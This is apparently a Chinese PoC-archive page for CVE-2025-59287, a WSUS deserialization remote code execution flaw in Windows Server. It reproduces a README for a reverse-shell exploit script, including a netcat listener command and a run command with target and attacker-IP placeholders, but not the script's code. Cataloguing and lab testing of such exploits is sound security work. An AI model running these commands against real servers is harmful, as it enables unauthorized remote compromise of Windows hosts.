POC详情: cff6ca0c68635408429edbf8a2dfd1adeec34f06

来源
https://github.com/FurkanKAYAPINAR/CVE-2025-59287
关联漏洞
标题: Microsoft Windows Server 代码问题漏洞 (CVE-2025-59287)
描述:Microsoft Windows Server是美国微软(Microsoft)公司的一套服务器操作系统。 Microsoft Windows Server存在代码问题漏洞,该漏洞源于攻击者利用该漏洞可以远程执行代码。
描述
CVE-2025-59287
介绍
# CVE-2025-59287

WSUS CVE-2025-59287 – XML Deserialization RCE (Reverse Shell)
A focused PoC to exploit WSUS CVE-2025-59287 via XML deserialization to achieve a Windows reverse shell. This script only supports a reverse shell payload (no calc fallback).
Target: Windows Server with WSUS role
Technique: SOAP + ObjectDataProvider deserialization
Result: cmd.exe launches PowerShell reverse shell to your listener
Disclaimer
For authorized testing in lab environments only. You are responsible for complying with all applicable laws.
Requirements
Python 3.x
Network access to WSUS endpoints (usually 8530/8531)
Listener on your machine (e.g., nc)

# Start listener
nc -lvnp 4444

# Run exploit
python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug

-u: WSUS base URL (http/https, typically port 8530/8531)
-l: Your IP to receive the shell
-p: Your listener port
--debug: Verbose output
文件快照

 [4.0K]  /data/pocs/cff6ca0c68635408429edbf8a2dfd1adeec34f06
├── [ 15K]  CVE-2025-59287.py
└── [ 911]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。